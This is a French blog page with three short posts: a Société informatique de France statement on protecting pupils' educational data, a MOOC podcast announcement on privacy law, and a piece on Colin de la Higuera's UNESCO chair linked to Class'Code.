    Le Directeur du Numérique pour l’Éducation, Mathieu Jeandron, a récemment envoyé une lettre qui encourage l’utilisation par les établissements scolaires de logiciels et de services d’entreprises numériques, pour administrer les données pédagogiques, c’est-à-dire les données concernant les élèves de l’Éducation nationale. Comme les données médicales, elles sont personnelles aux élèves, très sensibles et représentent une valeur considérable par exemple pour des agences de recrutement.

    CC0 Public Domain

    La Société informatique de France tient à rappeler qu’il incombe à l’Éducation nationale de les protéger.

    1. Ces données doivent rester sous le contrôle de l’Éducation nationale. Si elles devaient être hébergées sur un serveur administré par une entreprise autre que l’Éducation nationale, cela doit être fait en répondant à un cahier des charges précis et sous le contrôle étroit de l’Éducation nationale.
    2. Ces données doivent être stockées en Europe, pour être protégées par les lois européennes.
    3. Ces données ne peuvent en aucun cas être monétisées. Il serait, par exemple, totalement inacceptable d’abandonner une part de cette protection comme prix d’un sponsoring d’une entreprise privée.

    Il s’agit bien de questions de souveraineté de l’Éducation nationale et, au-delà, de la République. Il s’agit aussi de questions liées au respect de la vie privée des élèves.

    Les données pédagogiques ont une valeur énorme car, même si c’est encore peu le cas aujourd’hui, elles peuvent servir à améliorer l’enseignement, en évaluant les méthodes, les contenus, les outils. Elles permettent aussi de personnaliser l’enseignement dispensé aux élèves. Elles doivent pouvoir être utilisées pour des besoins pédagogiques de manière transparente et équitable, ce qui implique :

    • qu’elles soient systématiquement anonymisées lorsqu’elles ne sont pas utilisées à des fins de personnalisation d’un enseignement,
    • qu’elles soient partagées et non mises à disposition d’une entreprise particulière,
    • qu’elles soient exprimées dans un format libre et permettant leur interopérabilité,
    • que leur analyse soit effectuée par des programmes transparents et libres.

    Un tel cadre permettrait aux talents de l’Éducation nationale, aux entreprises, aux associations éducatives, de tout l’écosystème éducatif, de participer au grand défi de mettre le numérique au service de l’éducation.

    L’Éducation nationale enseigne aux élèves qu’ils doivent être responsables de leurs données. Elle doit être particulièrement exemplaire dans ce domaine, au risque sinon de perdre toute crédibilité.

    La Société Informatique de France encourage donc le gouvernement à une grande vigilance dans ce domaine.

    Conseil scientifique de la Société Informatique de France

  • Podcast : loi et vie privée

    Le numérique, la loi et notre vie privée

    La collecte massive de données modifie-t-elle la notion de « vie privée » ? Le droit doit-il s’adapter à une société devenue numérique ? Pourquoi et comment expliquer les résultats d’un algorithme ? L’articulation entre droit et techniques pose autant de questions de droit, société, éthique auxquelles tout citoyen doit être sensible…

    Cette vidéo est un des grains de culture scientifique et technique du MOOC sur l’Informatique et la Création Numérique. La vidéo a été réalisée par Manhattan Studio Production.

    Spécialiste en protection de la vie privée, Daniel Le Métayer est directeur de recherche au centre de recherche Inria Grenoble – Rhône-Alpes et membre de l’équipe de recherche Privatics. Jusqu’en juin 2016, il a été responsable de l’Inria Project Labs Cappris qui regroupait les équipes de recherche actives dans le domaine de la protection de la vie privée.

    Ses activités de recherche tournent autour des interactions entre le droit et les nouvelles technologies. Il lui arrive également d’alerter le public sur les limites et les dangers de certains projets comme ce fut le cas lors de la loi sur le renseignement (2015) et du décret instituant le fichier TES (2016).

    Pour aller plus loin

  • La Chaire de Colin

    « Former 300 000 éducateurs, animateurs, enseignants pour que ceux-ci puissent demain utiliser le code informatique dans leurs activités devant les enfants et les adolescents… ». Cela vous rappelle-t-il quelque chose ?  C’est la mission Class’Code, qui mêle formation à distance et temps de rencontre, apprivoisement de la machine et découverte de la pensée informatique sans ordinateur, apprenants et facilitateurs.  Cela vous avait paru un peu fou ? Pourtant, l’UNESCO (oui, oui, l’Organisation des Nations Unies pour l’éducation la science et la culture, elle-même) a été conquise au point d’attribuer à l’Université de Nantes une chaire* « en technologies pour la formation des enseignants par ressources éducatives libres ». Binaire a demandé à Sylvie Alayrangues de nous parler de cette chaire.  Serge Abiteboul.

    À l’origine de cette chaire, on trouve Colin de la Higuera, professeur des universités à Nantes, ex-président de la société informatique de France, ex-éditeur de binaire, déjà à l’origine de Class’Code.

    Colin de la Higuera au Congrés de la SIF à Poitiers, 2017, Photo Jean-François Billaud

    L’ambition de cette chaire est claire : donner une nouvelle dimension au projet Class’Code en travaillant non seulement à son amélioration et à sa pérennisation mais aussi à son extension à l’international et pourquoi pas à d’autres disciplines.

    Pour l’améliorer, des recherches sont d’ores et déjà menées, par exemple, pour évaluer le subtil équilibre entre formation à distance et temps de rencontre. L’extension vers les mathématiques est envisagée, bénéficiant de collaborations déjà existantes, liant la société informatique de France et Inria, les partenaires initiaux du projet, aux sociétés savantes des disciplines concernées. Enfin, dès son lancement, cette nouvelle aventure a également pris une envergure internationale en embarquant parmi ses premiers partenaires la « Knowledge for All Fondation« .

    Et la science informatique ? Elle n’est pas oubliée ! La chaire émarge déjà sur un premier projet européen, X5gon,  où il s’agit justement d’utiliser des techniques d’intelligence artificielle pour naviguer plus facilement et de manière plus pertinente dans un ensemble riche et complexe de ressources éducatives.

    Que dire de plus ? Et bien, que nous souhaitons à Colin de réussir à regrouper autour de lui, comme il a su le faire pour Class’Code, une dream team d’universitaires, de chercheurs, d’entreprises, d’acteurs de l’éducation populaire, de créateurs et de diffuseurs de ressources éducatives, de collectivités… Et peut-être, souhaitons-lui également que cette chaire porte bien haut les valeurs éthiques (communes à l’aventure Class’Code) qui la fondent, dans la vision d’une société solidaire où l’éducation de tous et à tout âge passe aussi par le partage et l’entraide.

    Sylvie Alayrangues, Maitre de Conférence à l’Université de Poitiers

    (*) Une chaire UNESCO lie un établissement d’enseignement supérieur à l’UNESCO autour d’un programme d’une durée initiale de 4 ans. L’objectif de ces programmes est de faire progresser l’enseignement, l’apprentissage ou la recherche dans un des domaines prioritaires de l’UNESCO. Une chaire permet, notamment, de développer des activités au niveau international en bénéficiant des réseaux et de la renommée de l’UNESCO.